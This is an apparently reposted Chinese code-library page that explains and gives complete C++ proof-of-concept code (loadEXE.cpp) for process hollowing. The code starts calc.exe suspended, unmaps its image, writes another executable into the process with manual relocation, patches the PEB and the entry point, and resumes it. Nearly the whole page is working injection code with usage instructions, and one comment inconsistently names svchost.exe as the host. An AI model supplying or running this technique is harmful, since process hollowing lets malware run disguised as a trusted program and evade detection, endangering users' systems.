首页 > 代码库 > 动态加载并执行Win32可执行程序

动态加载并执行Win32可执行程序

本文所贴出的PoC代码将告诉你如何通过CreateProcess创建一个傀儡进程(称之为可执行程序A),并把dwCreationFlags设置为CREATE_SUSPENDED,然后把另一个可执行程序(称之为可执行程序B)的内容加载到所创建的进程空间中,最终借用傀儡进程(A)的外壳来执行可执行程序B的内容。同时这段代码也会告诉你如何手工对Win32可执行程序进行重定位处理,以及如何从进程空间中取消已经映射的EXE映像。

在Windows操作系统下,通过给CreateProcess传递一个CREATE_SUSPENDED参数可以使得被创建的进程处于挂起状态,此时EXE的映像会被加载到进程空间中,但是并不会立即被执行,除非调用ResumeThread。在调用ResumeThread之前,可以通过调用ReadProcessMemory和WriteProcessMemory这样的API来读写进程空间的内容,这使得这样一种情形成为可能:通过读取另一个可执行文件的内容来覆盖刚创建的处于挂起状态的进程的空间,然后通过原始进程的空间来执行第二个可执行程序的内容。可以通过如下的步骤来完成这个过程:

  1. 通过给CreateProcess传递CREATE_SUSPENDED参数来创建一个处于挂起状态的进程(该进程为可执行程序A的一次执行)
  2. 通过调用GetThreadContext来获取被挂起进程的CONTEXT。其中ebx寄存器指向进程的PEB,eax寄存器的值为进程的入口点地址。
  3. 通过PEB来获取进程的基地址,如[EBX + 8]
  4. 把第二个可执行程序(B)加载到内存中并进行对齐处理,如果文件对齐尺寸和内存对齐尺寸不一致的话,这个操作是必须的。
  5. 如果可执行程序B和进程A有相同基地址并且B的内存镜像尺寸小于进程A的内存镜像尺寸,那么只需要简单的调用WriteProcessMemory来把可执行程序B的镜像写到进程A的内存空间之中,并从基地址开始执行即可。
  6. 否则的话,需要通过调用ZwUnmapViewOfSection(由ntdll.dll导出)来取消可执行程序A的映像映射,然后通过VirtualAllocEx在进程A中为可执行程序B分配足够的空间。调用VirtualAllocEx的时候,必须提供可执行程序B的基址以确保所分配的空间是从指定的位置开始的。然后把可执行程序B的镜像复制到进程A的内存空间并从分配的空间的起始地址开始执行。
  7. 如果ZwUnmapViewOfSection操作失败,而可执行程序B时可重定位的(存在重定位表),那么可以再进程A的内存空间的任意位置为B分配足够的空间,然后基于所分配的空间进行为B进行重定位处理,然后把可执行程序B的镜像复制到进程A的内存空间并从分配的空间的起始地址开始执行。
  8. 把进程A的PEB中的基地址改为可执行程序B的基地址。
  9. 把线程上下文中的EAX寄存器的值设置为可执行程序B的入口点。
  10. 通过调用SetThreadContext来设置线程的上下文。
  11. 通过调用ResumeThread来执行被挂起的进程。

PoC展示的技术点:

  1. 手工对可执行程序进行重定位处理(如果存在有重定位表的话)。
  2. 使用ZwUnmapViewOfSection取消原始EXE的内存映像的映射。
  3. 使用ReadProcessMemory和WriteProcessMemory来读写别的进程的内存空间。
  4. 通过修改进程的PEB来修改其基地址的值。

使用方法:傀儡进程默认为calc.exe(计算器),命令行下输入 loadEXE.exe

联系作者:chewkeong[AT]security.org.sg
原文链接:Dynamic Forking of Win32 EXE
原始代码:

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676
//******************************************************************************************// loadEXE.cpp : Defines the entry point for the console application.//// Proof-Of-Concept Code// Copyright (c) 2004// All rights reserved.//// Permission is hereby granted, free of charge, to any person obtaining a// copy of this software and associated documentation files (the// "Software"), to deal in the Software without restriction, including// without limitation the rights to use, copy, modify, merge, publish,// distribute, and/or sell copies of the Software, and to permit persons// to whom the Software is furnished to do so, provided that the above// copyright notice(s) and this permission notice appear in all copies of// the Software and that both the above copyright notice(s) and this// permission notice appear in supporting documentation.//// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT// OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR// HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL// INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING// FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,// NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION// WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.//// Usage:// loadEXE <EXE filename>//// This will execute calc.exe in suspended mode and replace its image with// the new EXE‘s image.  The thread is then resumed, thus causing the new EXE to// execute within the process space of svchost.exe.////****************************************************************************************** #include <stdio.h>#include <windows.h>#include <tlhelp32.h>#include <psapi.h> struct PE_Header {	unsigned long signature;	unsigned short machine;	unsigned short numSections;	unsigned long timeDateStamp;	unsigned long pointerToSymbolTable;	unsigned long numOfSymbols;	unsigned short sizeOfOptionHeader;	unsigned short characteristics;}; struct PE_ExtHeader{	unsigned short magic;	unsigned char majorLinkerVersion;	unsigned char minorLinkerVersion;	unsigned long sizeOfCode;	unsigned long sizeOfInitializedData;	unsigned long sizeOfUninitializedData;	unsigned long addressOfEntryPoint;	unsigned long baseOfCode;	unsigned long baseOfData;	unsigned long imageBase;	unsigned long sectionAlignment;	unsigned long fileAlignment;	unsigned short majorOSVersion;	unsigned short minorOSVersion;	unsigned short majorImageVersion;	unsigned short minorImageVersion;	unsigned short majorSubsystemVersion;	unsigned short minorSubsystemVersion;	unsigned long reserved1;	unsigned long sizeOfImage;	unsigned long sizeOfHeaders;	unsigned long checksum;	unsigned short subsystem;	unsigned short DLLCharacteristics;	unsigned long sizeOfStackReserve;	unsigned long sizeOfStackCommit;	unsigned long sizeOfHeapReserve;	unsigned long sizeOfHeapCommit;	unsigned long loaderFlags;	unsigned long numberOfRVAAndSizes;	unsigned long exportTableAddress;	unsigned long exportTableSize;	unsigned long importTableAddress;	unsigned long importTableSize;	unsigned long resourceTableAddress;	unsigned long resourceTableSize;	unsigned long exceptionTableAddress;	unsigned long exceptionTableSize;	unsigned long certFilePointer;	unsigned long certTableSize;	unsigned long relocationTableAddress;	unsigned long relocationTableSize;	unsigned long debugDataAddress;	unsigned long debugDataSize;	unsigned long archDataAddress;	unsigned long archDataSize;	unsigned long globalPtrAddress;	unsigned long globalPtrSize;	unsigned long TLSTableAddress;	unsigned long TLSTableSize;	unsigned long loadConfigTableAddress;	unsigned long loadConfigTableSize;	unsigned long boundImportTableAddress;	unsigned long boundImportTableSize;	unsigned long importAddressTableAddress;	unsigned long importAddressTableSize;	unsigned long delayImportDescAddress;	unsigned long delayImportDescSize;	unsigned long COMHeaderAddress;	unsigned long COMHeaderSize;	unsigned long reserved2;	unsigned long reserved3;};  struct SectionHeader{	unsigned char sectionName[8];	unsigned long virtualSize;	unsigned long virtualAddress;	unsigned long sizeOfRawData;	unsigned long pointerToRawData;	unsigned long pointerToRelocations;	unsigned long pointerToLineNumbers;	unsigned short numberOfRelocations;	unsigned short numberOfLineNumbers;	unsigned long characteristics;}; struct MZHeader{	unsigned short signature;	unsigned short partPag;	unsigned short pageCnt;	unsigned short reloCnt;	unsigned short hdrSize;	unsigned short minMem;	unsigned short maxMem;	unsigned short reloSS;	unsigned short exeSP;	unsigned short chksum;	unsigned short exeIP;	unsigned short reloCS;	unsigned short tablOff;	unsigned short overlay;	unsigned char reserved[32];	unsigned long offsetToPE;};  struct ImportDirEntry{	DWORD importLookupTable;	DWORD timeDateStamp;	DWORD fowarderChain;	DWORD nameRVA;	DWORD importAddressTable;};  //******************************************************************************************//// This function reads the MZ, PE, PE extended and Section Headers from an EXE file.////****************************************************************************************** bool readPEInfo(FILE *fp, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH,				SectionHeader **outSecHdr){	fseek(fp, 0, SEEK_END);	long fileSize = ftell(fp);	fseek(fp, 0, SEEK_SET); 	if(fileSize < sizeof(MZHeader))	{		printf("File size too small\n");				return false;	} 	// read MZ Header	MZHeader mzH;	fread(&mzH, sizeof(MZHeader), 1, fp); 	if(mzH.signature != 0x5a4d)		// MZ	{		printf("File does not have MZ header\n");		return false;	} 	//printf("Offset to PE Header = %X\n", mzH.offsetToPE); 	if((unsigned long)fileSize < mzH.offsetToPE + sizeof(PE_Header))	{		printf("File size too small\n");				return false;	} 	// read PE Header	fseek(fp, mzH.offsetToPE, SEEK_SET);	PE_Header peH;	fread(&peH, sizeof(PE_Header), 1, fp); 	//printf("Size of option header = %d\n", peH.sizeOfOptionHeader);	//printf("Number of sections = %d\n", peH.numSections); 	if(peH.sizeOfOptionHeader != sizeof(PE_ExtHeader))	{		printf("Unexpected option header size.\n"); 		return false;	} 	// read PE Ext Header	PE_ExtHeader peXH; 	fread(&peXH, sizeof(PE_ExtHeader), 1, fp); 	//printf("Import table address = %X\n", peXH.importTableAddress);	//printf("Import table size = %X\n", peXH.importTableSize);	//printf("Import address table address = %X\n", peXH.importAddressTableAddress);	//printf("Import address table size = %X\n", peXH.importAddressTableSize);  	// read the sections	SectionHeader *secHdr = new SectionHeader[peH.numSections]; 	fread(secHdr, sizeof(SectionHeader) * peH.numSections, 1, fp); 	*outMZ = mzH;	*outPE = peH;	*outpeXH = peXH;	*outSecHdr = secHdr; 	return true;}  //******************************************************************************************//// This function calculates the size required to load an EXE into memory with proper alignment.////****************************************************************************************** int calcTotalImageSize(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,				       SectionHeader *inSecHdr){	int result = 0;	int alignment = inpeXH->sectionAlignment; 	if(inpeXH->sizeOfHeaders % alignment == 0)		result += inpeXH->sizeOfHeaders;	else	{		int val = inpeXH->sizeOfHeaders / alignment;		val++;		result += (val * alignment);	}  	for(int i = 0; i < inPE->numSections; i++)	{		if(inSecHdr[i].virtualSize)		{			if(inSecHdr[i].virtualSize % alignment == 0)				result += inSecHdr[i].virtualSize;			else			{				int val = inSecHdr[i].virtualSize / alignment;				val++;				result += (val * alignment);			}		}	} 	return result;}  //******************************************************************************************//// This function calculates the aligned size of a section////****************************************************************************************** unsigned long getAlignedSize(unsigned long curSize, unsigned long alignment){		if(curSize % alignment == 0)		return curSize;	else	{		int val = curSize / alignment;		val++;		return (val * alignment);	}}  //******************************************************************************************//// This function loads a PE file into memory with proper alignment.// Enough memory must be allocated at ptrLoc.////****************************************************************************************** bool loadPE(FILE *fp, MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,			SectionHeader *inSecHdr, LPVOID ptrLoc){	char *outPtr = (char *)ptrLoc; 	fseek(fp, 0, SEEK_SET);	unsigned long headerSize = inpeXH->sizeOfHeaders;     int i = 0; 	// certain PE files have sectionHeaderSize value > size of PE file itself.  	// this loop handles this situation by find the section that is nearest to the	// PE header. 	for(i = 0; i < inPE->numSections; i++)	{		if(inSecHdr[i].pointerToRawData < headerSize)			headerSize = inSecHdr[i].pointerToRawData;	} 	// read the PE header	unsigned long readSize = fread(outPtr, 1, headerSize, fp);	//printf("HeaderSize = %d\n", headerSize);	if(readSize != headerSize)	{		printf("Error reading headers (%d %d)\n", readSize, headerSize);		return false;			} 	outPtr += getAlignedSize(inpeXH->sizeOfHeaders, inpeXH->sectionAlignment); 	// read the sections	for(i = 0; i < inPE->numSections; i++)	{		if(inSecHdr[i].sizeOfRawData > 0)		{			unsigned long toRead = inSecHdr[i].sizeOfRawData;			if(toRead > inSecHdr[i].virtualSize)				toRead = inSecHdr[i].virtualSize; 			fseek(fp, inSecHdr[i].pointerToRawData, SEEK_SET);			readSize = fread(outPtr, 1, toRead, fp); 			if(readSize != toRead)			{				printf("Error reading section %d\n", i);				return false;			}			outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH->sectionAlignment);		}		else		{			// this handles the case where the PE file has an empty section. E.g. UPX0 section			// in UPXed files. 			if(inSecHdr[i].virtualSize)				outPtr += getAlignedSize(inSecHdr[i].virtualSize, inpeXH->sectionAlignment);		}	} 	return true;}  struct FixupBlock{	unsigned long pageRVA;	unsigned long blockSize;};  //******************************************************************************************//// This function loads a PE file into memory with proper alignment.// Enough memory must be allocated at ptrLoc.////****************************************************************************************** void doRelocation(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,			      SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD newBase){	if(inpeXH->relocationTableAddress && inpeXH->relocationTableSize)	{		FixupBlock *fixBlk = (FixupBlock *)((char *)ptrLoc + inpeXH->relocationTableAddress);		long delta = newBase - inpeXH->imageBase; 		while(fixBlk->blockSize)		{			//printf("Addr = %X\n", fixBlk->pageRVA);			//printf("Size = %X\n", fixBlk->blockSize); 			int numEntries = (fixBlk->blockSize - sizeof(FixupBlock)) >> 1;			//printf("Num Entries = %d\n", numEntries); 			unsigned short *offsetPtr = (unsigned short *)(fixBlk + 1); 			for(int i = 0; i < numEntries; i++)			{				DWORD *codeLoc = (DWORD *)((char *)ptrLoc + fixBlk->pageRVA + (*offsetPtr & 0x0FFF)); 				int relocType = (*offsetPtr & 0xF000) >> 12; 				//printf("Val = %X\n", *offsetPtr);				//printf("Type = %X\n", relocType); 				if(relocType == 3)					*codeLoc = ((DWORD)*codeLoc) + delta;				else				{					printf("Unknown relocation type = %d\n", relocType);				}				offsetPtr++;			} 			fixBlk = (FixupBlock *)offsetPtr;		}	}	}  #define TARGETPROC "calc.exe" typedef struct _PROCINFO{	DWORD baseAddr;	DWORD imageSize;} PROCINFO;   //******************************************************************************************//// Creates the original EXE in suspended mode and returns its info in the PROCINFO structure.////******************************************************************************************  BOOL createChild(PPROCESS_INFORMATION pi, PCONTEXT ctx, PROCINFO *outChildProcInfo){	STARTUPINFO si = {0}; 	if(CreateProcess(NULL, TARGETPROC,		             NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, pi))			{		ctx->ContextFlags=CONTEXT_FULL;		GetThreadContext(pi->hThread, ctx); 		DWORD *pebInfo = (DWORD *)ctx->Ebx;		DWORD read;		ReadProcessMemory(pi->hProcess, &pebInfo[2], (LPVOID)&(outChildProcInfo->baseAddr), sizeof(DWORD), &read); 		DWORD curAddr = outChildProcInfo->baseAddr;		MEMORY_BASIC_INFORMATION memInfo;		while(VirtualQueryEx(pi->hProcess, (LPVOID)curAddr, &memInfo, sizeof(memInfo)))		{			if(memInfo.State == MEM_FREE)				break;			curAddr += memInfo.RegionSize;		}		outChildProcInfo->imageSize = (DWORD)curAddr - (DWORD)outChildProcInfo->baseAddr; 		return TRUE;	}	return FALSE;}  //******************************************************************************************//// Returns true if the PE file has a relocation table////****************************************************************************************** BOOL hasRelocationTable(PE_ExtHeader *inpeXH){	if(inpeXH->relocationTableAddress && inpeXH->relocationTableSize)	{		return TRUE;	}	return FALSE;}  typedef DWORD (WINAPI *PTRZwUnmapViewOfSection)(IN HANDLE ProcessHandle, IN PVOID BaseAddress);  //******************************************************************************************//// To replace the original EXE with another one we do the following.// 1) Create the original EXE process in suspended mode.// 2) Unmap the image of the original EXE.// 3) Allocate memory at the baseaddress of the new EXE.// 4) Load the new EXE image into the allocated memory.  // 5) Windows will do the necessary imports and load the required DLLs for us when we resume the suspended //    thread.//// When the original EXE process is created in suspend mode, GetThreadContext returns these useful// register values.// EAX - process entry point// EBX - points to PEB//// So before resuming the suspended thread, we need to set EAX of the context to the entry point of the// new EXE.////****************************************************************************************** void doFork(MZHeader *inMZ, PE_Header *inPE, PE_ExtHeader *inpeXH,			SectionHeader *inSecHdr, LPVOID ptrLoc, DWORD imageSize){	STARTUPINFO si = {0};	PROCESS_INFORMATION pi;	CONTEXT ctx;	PROCINFO childInfo; 	if(createChild(&pi, &ctx, &childInfo)) 	{				printf("Original EXE loaded (PID = %d).\n", pi.dwProcessId);		printf("Original Base Addr = %X, Size = %X\n", childInfo.baseAddr, childInfo.imageSize); 		LPVOID v = (LPVOID)NULL; 		if(inpeXH->imageBase == childInfo.baseAddr && imageSize <= childInfo.imageSize)		{			// if new EXE has same baseaddr and is its size is <= to the original EXE, just			// overwrite it in memory			v = (LPVOID)childInfo.baseAddr;			DWORD oldProtect;			VirtualProtectEx(pi.hProcess, (LPVOID)childInfo.baseAddr, childInfo.imageSize, PAGE_EXECUTE_READWRITE, &oldProtect);			 			printf("Using Existing Mem for New EXE at %X\n", (unsigned long)v);		}		else		{			// get address of ZwUnmapViewOfSection			PTRZwUnmapViewOfSection pZwUnmapViewOfSection = (PTRZwUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwUnmapViewOfSection"); 			// try to unmap the original EXE image			if(pZwUnmapViewOfSection(pi.hProcess, (LPVOID)childInfo.baseAddr) == 0)			{				// allocate memory for the new EXE image at the prefered imagebase.				v = VirtualAllocEx(pi.hProcess, (LPVOID)inpeXH->imageBase, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);				if(v)					printf("Unmapped and Allocated Mem for New EXE at %X\n", (unsigned long)v);			}		} 		if(!v && hasRelocationTable(inpeXH))		{			// if unmap failed but EXE is relocatable, then we try to load the EXE at another			// location			v = VirtualAllocEx(pi.hProcess, (void *)NULL, imageSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);			if(v)			{				printf("Allocated Mem for New EXE at %X. EXE will be relocated.\n", (unsigned long)v); 				// we‘ve got to do the relocation ourself if we load the image at another				// memory location								doRelocation(inMZ, inPE, inpeXH, inSecHdr, ptrLoc, (DWORD)v);			}		} 		printf("EIP = %X\n", ctx.Eip);		printf("EAX = %X\n", ctx.Eax);		printf("EBX = %X\n", ctx.Ebx);		// EBX points to PEB		printf("ECX = %X\n", ctx.Ecx);		printf("EDX = %X\n", ctx.Edx); 		if(v)		{						printf("New EXE Image Size = %X\n", imageSize); 			// patch the EXE base addr in PEB (PEB + 8 holds process base addr)			DWORD *pebInfo = (DWORD *)ctx.Ebx;			DWORD wrote;									WriteProcessMemory(pi.hProcess, &pebInfo[2], &v, sizeof(DWORD), &wrote); 			// patch the base addr in the PE header of the EXE that we load ourselves			PE_ExtHeader *peXH = (PE_ExtHeader *)((DWORD)inMZ->offsetToPE + sizeof(PE_Header) + (DWORD)ptrLoc);			peXH->imageBase = (DWORD)v; 			if(WriteProcessMemory(pi.hProcess, v, ptrLoc, imageSize, NULL))			{					printf("New EXE image injected into process.\n"); 				ctx.ContextFlags=CONTEXT_FULL;								//ctx.Eip = (DWORD)v + ((DWORD)dllLoaderWritePtr - (DWORD)ptrLoc); 				if((DWORD)v == childInfo.baseAddr)				{					ctx.Eax = (DWORD)inpeXH->imageBase + inpeXH->addressOfEntryPoint;		// eax holds new entry point				}				else				{					// in this case, the DLL was not loaded at the baseaddr, i.e. manual relocation was					// performed.					ctx.Eax = (DWORD)v + inpeXH->addressOfEntryPoint;		// eax holds new entry point				} 				printf("********> EIP = %X\n", ctx.Eip);				printf("********> EAX = %X\n", ctx.Eax); 				SetThreadContext(pi.hThread,&ctx); 				ResumeThread(pi.hThread);				printf("Process resumed (PID = %d).\n", pi.dwProcessId);			}			else			{				printf("WriteProcessMemory failed\n");				TerminateProcess(pi.hProcess, 0);			}		}		else		{			printf("Load failed.  Consider making this EXE relocatable.\n");			TerminateProcess(pi.hProcess, 0);		}	}	else	{		printf("Cannot load %s\n", TARGETPROC);	}}    int main(int argc, char* argv[]){	if(argc != 2)	{		printf("\nUsage: %s <EXE filename>\n", argv[0]);		return 1;	} 	FILE *fp = fopen(argv[1], "rb");	if(fp)	{		MZHeader mzH;		PE_Header peH;		PE_ExtHeader peXH;		SectionHeader *secHdr; 		if(readPEInfo(fp, &mzH, &peH, &peXH, &secHdr))		{			int imageSize = calcTotalImageSize(&mzH, &peH, &peXH, secHdr);			//printf("Image Size = %X\n", imageSize); 			LPVOID ptrLoc = VirtualAlloc(NULL, imageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);			if(ptrLoc)			{				//printf("Memory allocated at %X\n", ptrLoc);				loadPE(fp, &mzH, &peH, &peXH, secHdr, ptrLoc);												 				doFork(&mzH, &peH, &peXH, secHdr, ptrLoc, imageSize);											}			else				printf("Allocation failed\n");		} 		fclose(fp);	}	else		printf("\nCannot open the EXE file!\n"); 	return 0;}

 

 

 

http://www.programlife.net/dynamic-forking-of-win32-exe.html

动态加载并执行Win32可执行程序